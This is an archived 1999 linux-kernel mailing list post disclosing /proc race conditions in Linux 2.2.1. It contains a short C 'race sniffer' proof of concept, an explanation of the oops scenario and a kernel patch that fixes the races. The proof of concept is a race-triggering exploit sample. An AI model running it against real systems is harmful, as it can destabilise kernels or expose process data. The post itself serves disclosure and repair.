[ http://www.rootshell.com/ ]

Date: Tue, 2 Feb 1999 17:39:13 +0100
From: Andrea Arcangeli
Subject: [patch] /proc race fixes for 2.2.1 (fwd)

/*
 * Copyright (C) 1999 Andrea Arcangeli
 * Linux-2.2.1 /proc SMP race sniffer
 */

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>

static volatile int pid = -1;
static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER;

static int get_current_pid(void)
{
        int __pid;

        pthread_mutex_lock(&pid_lock);
        __pid = pid;
        pthread_mutex_unlock(&pid_lock);

        return __pid;
}

static void * sniffer(void *dummy)
{
        int cache_pid = -1, fd = -1, length_cmp = 0;
        char str[50], buf[2000], sample[2000];

        /* wait until main() has published the first zombie */
        pthread_mutex_lock(&zombie_lock);
        pthread_mutex_unlock(&zombie_lock);

        for (;;) {
                if (get_current_pid() != cache_pid) {
                        pthread_mutex_lock(&zombie_lock);
                        cache_pid = pid;
                        snprintf(str, sizeof(str), "/proc/%d/stat", cache_pid);
                        if (fd > 0)
                                close(fd);
                        fd = open(str, O_RDONLY|O_NONBLOCK);
                        if (fd > 0) {
                                int length = read(fd, buf, sizeof(buf));
                                if (length > 0) {
                                        length_cmp = length;
                                        memcpy(sample, buf, length);
                                        sample[length-1] = 0;
                                }
                        }
                        pthread_mutex_unlock(&zombie_lock);
                }
                if (fd > 0) {
                        int length;

                        lseek(fd, 0, SEEK_SET);
                        length = read(fd, buf, sizeof(buf));
                        if (length <= 0)
                                continue;
                        buf[length-1] = 0;
                        if (length >= length_cmp &&
                            memcmp(buf, sample, length_cmp))
                                printf("length %d, pid %d\n"
                                       "original data: %s\n"
                                       "modified data: %s\n",
                                       length, cache_pid, sample, buf);
                }
        }
}

static int is_zombie(int __pid)
{
        char str[50], state;
        FILE * status;

        snprintf(str, sizeof(str), "/proc/%d/status", __pid);
        status = fopen(str, "r");
        if (!status) {
                perror("fopen");
                exit(2);
        }
        fscanf(status, "%*s\t%*s\nState:\t%c", &state);
        fclose(status);

        if (state != 'Z')
                return 0;
        return 1;
}

int main(int argc, char *argv[])
{
        int dummy;
        pthread_t task_struct_sniffer;

        pthread_mutex_lock(&zombie_lock);
        if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL)) {
                perror("pthread_create");
                exit(1);
        }

        for (;;) {
                int __pid = fork();

                if (!__pid)
                        _exit(0);
                /* busy-wait until the child shows up as a zombie */
                while (!is_zombie(__pid));

                pthread_mutex_lock(&pid_lock);
                pid = __pid;
                pthread_mutex_unlock(&pid_lock);
                pthread_mutex_unlock(&zombie_lock);

                usleep(1);
                wait(&dummy);

                pthread_mutex_lock(&zombie_lock);
        }
        pthread_mutex_unlock(&zombie_lock);
}

It probably has bugs too (since I have no chance of making it work here, I
am not going to look at it further); I attach it only in case someone is
interested in an exploit sample.

BTW, is there a better way to know when the child has become a zombie than
reading /proc/<pid-of-child>/status? I thought of catching the SIGCHLD
signal, but first I was not sure that a wait() would still be woken up that
way (too lazy to check signal.c ;), and second, with the /proc/<pid>/status
approach I had to write less code anyway, and since this is not a
performance-critical piece of code I had no doubt about which way to
take ;).
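(For reference, here is a minimal standalone sketch of the SIGCHLD
alternative; it is illustrative only, nothing in it comes from the code
above. The answer to the wait() question is yes: a SIGCHLD handler does not
consume the child's exit status, so a later wait() still blocks and reaps
the zombie as usual.)

#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

static volatile sig_atomic_t child_is_zombie;

/* SIGCHLD is delivered when the child exits, i.e. exactly when it
 * becomes a zombie; it stays a zombie until someone wait()s for it. */
static void chld_handler(int sig)
{
        child_is_zombie = 1;
}

int main(void)
{
        struct sigaction sa;
        int pid, status;

        sa.sa_handler = chld_handler;
        sigemptyset(&sa.sa_mask);
        sa.sa_flags = 0;
        sigaction(SIGCHLD, &sa, NULL);

        pid = fork();
        if (!pid)
                _exit(0);

        while (!child_is_zombie)
                ;       /* spin; the flag is set by the signal handler */

        printf("child %d is a zombie now\n", pid);
        wait(&status);  /* reaping removes the zombie */
        return 0;
}

(Spinning on the flag mirrors the /proc polling above; replacing it with a
plain pause() would be racy, one would want sigsuspend() instead.)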
I also now understand the reason for the 2.2.0 oopses and for processes
stuck in D state. Something like this was happening:

        `ps`                            tsk
        -------------                   -----------------
        sys_read()
        lock_kernel()
                                        do_page_fault()
        array_read()                    down(tsk->mm)
                                        find_vma()
        get_process_array()             handle_mm_fault()
                                        lock_kernel()
                                        /* woowoo, so spin on the
                                           big kernel lock */
        get_stat()
        grab_task()
        down(tsk->mm) /* just owned by tsk */
        schedule() /* so release the big kernel lock */
                                        tsk gets the big kernel lock here
                                        finish the page fault
                                        __up()
                                        wake_up_process(`ps`)
                                        many other things
                                        execve() /* this is the harmful one */
                                        mmput(tsk->mm);
                                        tsk->mm = mm_alloc(); (mm->count = 1)
                                        finish execve...
                                        .... everything he wants ....
        now `ps` gets rescheduled and
        owns the mm->semaphore (of a
        mm_struct that is not tsk->mm
        anymore)
        release_task(tsk);
        mmput(tsk->mm); (but mm->count was 1!!)
                exit_mmap();
                zap_page_range() /* aieee! */

At the first fault it will get a mm = &init_mm!!

Things like this can't happen in 2.2.0-pre9, simply because there tsk->mm
was still referencing the old mm of the process (the one from before the
execve): tsk->mm was a copy, not a runtime value. Obviously the (1) copy
approach had the stack-overflow and performance problems. So now I have
fixed all the races with a zerocopy approach (originally suggested by
Linus) that increments the page count of the process stack instead of
doing the copy, and that also assures array.c always uses the mm it
grabbed earlier (with mmget()). Works fine here.
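The idea of the fix in miniature: take the reference while the pointer is
still known to be live (under the lock that protects it), and only then
sleep on the semaphore. Below is a userspace analogue of that pattern; it
is my own sketch, not kernel code, and the names merely mirror the patch
for readability.

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct mm {
        int count;                      /* protected by count_lock */
        pthread_mutex_t mmap_sem;
};

static pthread_mutex_t count_lock = PTHREAD_MUTEX_INITIALIZER;
static struct mm * current_mm;          /* plays the role of tsk->mm */

static struct mm * mm_alloc(void)
{
        struct mm * mm = malloc(sizeof(*mm));
        mm->count = 1;
        pthread_mutex_init(&mm->mmap_sem, NULL);
        return mm;
}

static void mmput(struct mm * mm)
{
        int last;

        pthread_mutex_lock(&count_lock);
        last = !--mm->count;
        pthread_mutex_unlock(&count_lock);
        if (last)
                free(mm);               /* only the last user frees it */
}

/* the reader side, shaped like grab_mm()/release_mm() in the patch */
static struct mm * grab_mm(void)
{
        struct mm * mm;

        pthread_mutex_lock(&count_lock);
        mm = current_mm;
        mm->count++;                    /* pin it while it is known live */
        pthread_mutex_unlock(&count_lock);
        pthread_mutex_lock(&mm->mmap_sem);      /* now sleeping is safe */
        return mm;
}

static void release_mm(struct mm * mm)
{
        pthread_mutex_unlock(&mm->mmap_sem);
        mmput(mm);
}

int main(void)
{
        struct mm * mm, * old;

        current_mm = mm_alloc();
        mm = grab_mm();                 /* reader pins the current mm */

        /* "execve": swap in a fresh mm and drop the old reference.
         * Without the reader's extra count this would free() an mm
         * whose semaphore is still held -- the 2.2.1 bug. */
        old = current_mm;
        current_mm = mm_alloc();
        mmput(old);                     /* count 2 -> 1: still alive */
        printf("old mm survived the execve swap\n");

        release_mm(mm);                 /* count 1 -> 0: freed safely */
        return 0;
}

Note that grab_mm()/grab_task() in the actual patch also remember which mm
they pinned, so the final mmput() is guaranteed to run on that same mm and
not on a tsk->mm re-read after an execve.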
Patch against 2.2.1:

--- /tmp/array.c        Tue Feb  2 00:08:07 1999
+++ linux/fs/proc/array.c        Mon Feb  1 23:51:51 1999
@@ -389 +390,30 @@
-static unsigned long get_phys_addr(struct task_struct * p, unsigned long ptr)
+/*
+ * Caller must release_mm the mm_struct later.
+ * You don't get any access to init_mm.
+ */
+static struct mm_struct * grab_mm(int pid)
+{
+        struct mm_struct * mm = NULL;
+        struct task_struct * tsk;
+
+        read_lock(&tasklist_lock);
+        tsk = find_task_by_pid(pid);
+        /*
+         * NOTE: this doesn't race because we are protected by the
+         * big kernel lock. -arca
+         */
+        if (tsk && tsk->mm && tsk->mm != &init_mm)
+                mmget(mm = tsk->mm);
+        read_unlock(&tasklist_lock);
+        if (mm)
+                down(&mm->mmap_sem);
+        return mm;
+}
+
+static void release_mm(struct mm_struct *mm)
+{
+        up(&mm->mmap_sem);
+        mmput(mm);
+}
+
+static unsigned long get_phys_addr(struct mm_struct *mm, unsigned long ptr)
@@ -395 +425 @@
-        if (!p || !p->mm || ptr >= TASK_SIZE)
+        if (ptr >= TASK_SIZE)
@@ -398,2 +428,2 @@
-        if (!p->mm->pgd) {
-                printk("get_phys_addr: pid %d has NULL pgd!\n", p->pid);
+        if (!mm->pgd) {
+                printk(KERN_DEBUG "missing pgd for mm %p\n", mm);
@@ -403 +433 @@
-        page_dir = pgd_offset(p->mm,ptr);
+        page_dir = pgd_offset(mm,ptr);
@@ -425 +455 @@
-static int get_array(struct task_struct *p, unsigned long start, unsigned long end, char * buffer)
+static int get_array(struct mm_struct *mm, unsigned long start, unsigned long end, char * buffer)
@@ -434 +464 @@
-        addr = get_phys_addr(p, start);
+        addr = get_phys_addr(mm, start);
@@ -456,5 +486,2 @@
-        struct task_struct *p;
-
-        read_lock(&tasklist_lock);
-        p = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
+        struct mm_struct *mm;
+        int res = 0;
@@ -462,3 +489,6 @@
-        if (!p || !p->mm)
-                return 0;
-        return get_array(p, p->mm->env_start, p->mm->env_end, buffer);
+        mm = grab_mm(pid);
+        if (mm) {
+                res = get_array(mm, mm->env_start, mm->env_end, buffer);
+                release_mm(mm);
+        }
+        return res;
@@ -469 +499,2 @@
-        struct task_struct *p;
+        struct mm_struct *mm;
+        int res = 0;
@@ -471,6 +502,6 @@
-        read_lock(&tasklist_lock);
-        p = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
-        if (!p || !p->mm)
-                return 0;
-        return get_array(p, p->mm->arg_start, p->mm->arg_end, buffer);
+        mm = grab_mm(pid);
+        if (mm) {
+                res = get_array(mm, mm->arg_start, mm->arg_end, buffer);
+                release_mm(mm);
+        }
+        return res;
@@ -725 +707 @@
-static inline char * task_mem(struct task_struct *p, char *buffer)
+static inline char * task_mem(struct mm_struct * mm, char *buffer)
@@ -727,4 +709,2 @@
-        struct mm_struct * mm = p->mm;
-
-        if (mm && mm != &init_mm) {
-                struct vm_area_struct * vma = mm->mmap;
+        if (mm) {
+                struct vm_area_struct * vma;
@@ -819,0 +800,39 @@
+static struct task_struct *grab_task(int pid, struct mm_struct ** mm)
+{
+        struct task_struct *tsk = current;
+
+        *mm = NULL;
+        read_lock(&tasklist_lock);
+        tsk = find_task_by_pid(pid);
+        if (tsk)
+        {
+                struct mm_struct * __mm;
+                struct page * page = mem_map + MAP_NR(tsk);
+                atomic_inc(&page->count);
+                /*
+                 * NOTE: this doesn't race because we are protected
+                 * by the big kernel lock. -arca
+                 */
+                __mm = tsk->mm;
+                if (__mm && __mm != &init_mm)
+                {
+                        mmget(__mm);
+                        *mm = __mm;
+                }
+        }
+        read_unlock(&tasklist_lock);
+        if (*mm)
+                down(&(*mm)->mmap_sem);
+
+        return tsk;
+}
+
+static void release_task(struct task_struct *tsk, struct mm_struct * mm)
+{
+        if (mm)
+        {
+                up(&mm->mmap_sem);
+                mmput(mm);
+        }
+        free_pages((unsigned long) tsk, 1);
+}
@@ -825,4 +844,3 @@
-
-        read_lock(&tasklist_lock);
-        tsk = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
+        struct mm_struct * mm;
+
+        tsk = grab_task(pid, &mm);
@@ -833 +851 @@
-        buffer = task_mem(tsk, buffer);
+        buffer = task_mem(mm, buffer);
@@ -835,0 +854 @@
+        release_task(tsk, mm);
@@ -841,0 +861 @@
+        struct mm_struct * mm;
@@ -846,0 +867 @@
+        int res;
@@ -848,3 +869 @@
-        read_lock(&tasklist_lock);
-        tsk = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
+        tsk = grab_task(pid, &mm);
@@ -855,3 +874,4 @@
-        if (tsk->mm && tsk->mm != &init_mm) {
-                struct vm_area_struct *vma = tsk->mm->mmap;
-                while (vma) {
+        if (mm) {
+                struct vm_area_struct *vma;
+
+                for (vma = mm->mmap; vma; vma = vma->vm_next) {
@@ -859 +878,0 @@
-                        vma = vma->vm_next;
@@ -860,0 +880 @@
+
@@ -881 +901 @@
-        return sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
+        res = sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
@@ -907 +927 @@
-                tsk->mm ? tsk->mm->rss : 0, /* you might want to shift this left 3 */
+                mm ? mm->rss : 0, /* you might want to shift this left 3 */
@@ -909,3 +929,3 @@
-                tsk->mm ? tsk->mm->start_code : 0,
-                tsk->mm ? tsk->mm->end_code : 0,
-                tsk->mm ? tsk->mm->start_stack : 0,
+                mm ? mm->start_code : 0,
+                mm ? mm->end_code : 0,
+                mm ? mm->start_stack : 0,
@@ -925,0 +946,3 @@
+
+        release_task(tsk, mm);
+        return res;
@@ -1003 +1025,0 @@
-        struct task_struct *tsk;
@@ -1004,0 +1027 @@
+        struct mm_struct *mm;
@@ -1006,7 +1029,3 @@
-        read_lock(&tasklist_lock);
-        tsk = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
-        if (!tsk)
-                return 0;
-        if (tsk->mm && tsk->mm != &init_mm) {
-                struct vm_area_struct * vma = tsk->mm->mmap;
+        mm = grab_mm(pid);
+        if (mm) {
+                struct vm_area_struct * vma = mm->mmap;
@@ -1015 +1034 @@
-                pgd_t *pgd = pgd_offset(tsk->mm, vma->vm_start);
+                pgd_t *pgd = pgd_offset(mm, vma->vm_start);
@@ -1032,0 +1052 @@
+        release_mm(mm);
@@ -1070 +1089,0 @@
-
@@ -1074 +1093,2 @@
-        struct task_struct *p;
+        struct task_struct * p;
+        struct mm_struct * mm;
@@ -1079 +1098,0 @@
-        int volatile_task;
@@ -1091,3 +1110 @@
-        read_lock(&tasklist_lock);
-        p = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
+        p = grab_task(pid, &mm);
@@ -1097 +1114 @@
-        if (!p->mm || p->mm == &init_mm || count == 0)
+        if (!mm || count == 0)
@@ -1100,3 +1116,0 @@
-        /* Check whether the mmaps could change if we sleep */
-        volatile_task = (p != current || atomic_read(&p->mm->count) > 1);
-
@@ -1108 +1122 @@
-        for (map = p->mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
+        for (map = mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
@@ -1179,6 +1192,0 @@
-
-                /* By writing to user space, we might have slept.
-                 * Stop the loop, to avoid a race condition.
-                 */
-                if (volatile_task)
-                        break;
@@ -1190,0 +1199 @@
+        release_task(p, mm);
@@ -1202 +1211,2 @@
-        struct task_struct * tsk = current ;
+        struct task_struct * tsk;
+        struct mm_struct * mm;
@@ -1205,6 +1215,2 @@
-        read_lock(&tasklist_lock);
-        if (pid != tsk->pid)
-                tsk = find_task_by_pid(pid);
-        read_unlock(&tasklist_lock);        /* FIXME!! This should be done after the last use */
-
-        if (tsk == NULL)
+        tsk = grab_task(pid, &mm);
+        if (!tsk)
@@ -1223,0 +1230 @@
+        release_task(tsk, mm);

Andrea Arcangeli

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/